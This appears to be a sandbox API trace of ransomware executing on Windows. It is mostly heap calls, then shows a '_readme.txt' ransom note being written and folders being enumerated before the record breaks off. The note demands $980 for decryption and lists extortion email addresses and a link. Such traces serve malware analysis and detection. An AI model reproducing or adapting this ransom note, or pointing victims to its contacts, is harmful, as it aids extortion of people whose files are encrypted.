[0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.763] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.763] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.764] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.764] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.765] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.765] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.766] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.766] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.767] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.767] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.767] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0165.767] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.768] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.768] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.768] PathFindFileNameW (pszPath="") returned="" [0165.768] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.768] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.769] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.769] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.769] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.769] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.769] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.769] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0165.769] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.769] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.769] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0165.769] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.769] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.769] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.770] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.770] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.770] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.770] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.770] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.770] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.770] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.770] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.770] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, 